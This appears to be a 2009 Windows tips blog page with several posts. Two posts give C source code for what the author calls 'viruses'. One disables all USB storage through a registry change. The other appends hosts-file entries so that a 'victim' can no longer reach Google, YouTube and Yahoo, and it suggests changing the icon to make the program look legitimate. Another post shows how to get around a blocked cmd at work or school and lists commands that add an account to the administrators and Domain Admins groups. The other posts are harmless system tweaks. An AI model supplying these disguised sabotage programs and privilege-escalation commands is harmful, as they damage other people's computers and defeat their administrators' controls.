just for education purpose-code to enable and disable usb ports

Posted by R.D on Thursday, November 26, 2009 / Labels: , , , / Comments: (0)
In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

To disable the USB ports

Quote:
#include
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}

save as block_usb.c and compile using turboc

Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected.

To re-enable the USB ports
Code:

Quote:
#include
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}

save as unblock_usb.c and compile using turboc and then
just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected

Restore files with or without Win CD

Posted by R.D / Labels: , / Comments: (0)
(System File Checker\Repairs) Command Line
• "SFC" is used to scan and repair all protected system files.
• "SFC /SCANNOW" scans files straight away.
• "SFC /SCANBOOT" scans files every time computer boots.
• "SFC /REVERT" returns SFC to its default settings.
• "SFC /?" will give you further help when using the command.

Locate your Windows XP installation CD. If you don't have one, you'll need to locate a directory on your system that's named"i386" (without the quotes). This directory may be on a hidden partition on your hard drive. Go to Start, then to Run, and type in "SFC /SCANNOW" (without the quotes - and with a space between the SFC and the /SCANNOW). The press Enter. (For VISTA, go to Start and type in the above information, then go to the top of the box and right click on SFC /SCANNOW and select "Run As Administrator"). The program may (or it may not) ask you for your Windows XP installation CD - please insert it at the prompt. If it doesn't ask you for the CD this means that it wasn't necessary to replace any files. In the event the the system asks you for the CD, you must visit Windows Update immediately after the scan is completed (Please note that there won't be any confirmation dialog - the program will just exit without telling you anything). If this doesn't repair the problem with your system other troubleshooting procedures are required

how to block websites using c code

Posted by R.D / Labels: / Comments: (0)
Most of us are familiar with the virus that used to block Orkut and Youtube site. creating such a on . I will give a brief introduction about this code before I jump into the technical jargon.

This code has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the code. This program need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
Here is the sourcecode

Quote:
#include
#include
#include

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

compile the program using turboc and launch the .exe file generated
Testing

1. To test, run the compiled module. It will block the sites that is listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

3. To remove the virus type the following the Run.
Code:

Quote:
%windir%\system32\drivers\etc

4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

Code:

Quote:
127.0.0.1—————————google.com

5. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the program to make it look like a legitimate program

How to access cmd if it is blocked!

Posted by R.D / Labels: , / Comments: (0)
This is a guide that can give you access to cmd.exe if it is blocked at your work or school.

1-Open notepad

2-Type "command.com" in the text file

3- Save the file as command.bat( or whatever you want, as long as it ends in .bat.)

Additional Tips

Admin Control-
net user YOURUSER YOURPASS /add >> Add_admin.txt
net localgroup Administrator YOURUSER /add >> Add_admin.txt
net group "Domain Admins" YOURUSER /add >> Add_admin.tx

Create a Password Reset Disk

Posted by R.D / Labels: , , / Comments: (0)
If you’re running Windows XP Professional as a local user in a workgroup environment, you can create a password reset disk to log onto your computer when you forget your password. To create the disk:

1.Click Start, click Control Panel, and then click User Accounts.
2.Click your account name.
3.Under Related Tasks, click Prevent a forgotten password.
4.Follow the directions in the Forgotten Password Wizard to create a password reset disk.
5.Store the disk in a secure location, because anyone using it can access your local user account

Speed up acrobat loading

Posted by R.D / Labels: / Comments: (0)
Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)
2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).
Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).
Now your acrobat reader will load very fast and almost as good as notepad..

Adding the Quick Launch Bar Back to Windows 7

Posted by R.D / Labels: / Comments: (0)
To add the toolbar back, you’ll want to right-click on an open area of the taskbar, and choose Toolbars \ New Toolbar from the menu. You should probably also unlock the taskbar at this point.

Now’s the slightly tricky part… you’ll want to paste the following path into the location bar:

Code:
%appdata%\Microsoft\Internet Explorer\Quick Launch
Make sure that the location bar shows the full path, like the next screenshot, before you choose the “Select Folder” button.

You’ll immediately notice the Quick Launch toolbar on the taskbar, but it’s all the way over on the right, so you’ll want to click on the dotted lines and then drag the toolbar all the way to the left (which is slightly tricky sometimes). Note that you’ll need to right-click and unlock the taskbar before you can move the toolbar.

There we go, it’s over on the left… but now you’ll want to adjust the regular taskbar toolbar to be closer to the left, so use the dotted lines to drag it over as well.

The normal Quick Launch that we’re used to doesn’t have text, so right-click on the dotted lines and uncheck “Show Text” as well as “Show Title” from the menu.

Once you’re sure it’s the way you want it, you should check the “Lock the taskbar” again.

And there you are, the quick launch bar has returned and there’s virtually no way anybody would know this is Windows 7

Hide/show installed appz in add/remove programmes

Posted by R.D / Labels: , , , / Comments: (0)
The Add/Remove Programs list is populated from the following registry key:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Uninstall

Under the Uninstall key, there will be several sub-keys, each representing a software program that you installed. The following example shows how to hide the AnalogX Proxy entry from Add/Remove Programs listing:


Click Start, Run and type Regedit.exe
Navigate to the following location:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Uninstall \ AnalogX Proxy

In the right-pane, right-click the DisplayName value and choose Rename
Rename it to anything (For example, NoDisplayName )
The AnalogX Proxy entry is now hidden. To make it visible again, rename the value back to DisplayName

Enabling right click on sites that disable it

Posted by R.D / Labels: , / Comments: (0)
Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.

It's easy to change, assuming your using IE 6:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.

OR

A Better way is to just get used to right clicking and hitting the Esc "Escape" Key "NOT at the same time but very close to it" right click first then Esc. Until you are allowed access to the context menu to copy/save the file/photo.... Sometimes it takes a couple of tries but with practice comes perfection. Nothing to change or Undo.

Vista - Changing the Boot Screen

Posted by R.D / Labels: , / Comments: (0)
STEP ONE:
Navigate yourself to C:\Windows\system32\en-US for english; \NL-nl for Dutch and so on for each language available for Vista.

STEP TWO:
Find winload.exe.mui and open the Properties for this file.
Click on the 'Security' tab, now choose 'Advanced' and set the ownership of this file to 'Users'.

STEP THREE:
Now you need to copy and paste your desired background and replace it with the background from the folder 'system32\en-US folder'

STEP FOUR:
Now, goto 'Start > Run' and type 'msconfig'.

STEP FIVE:
Choose the 'Boot' tab and now enable 'No GUI Boot'

STEP SIX:
Close msconfig and reboot your computer.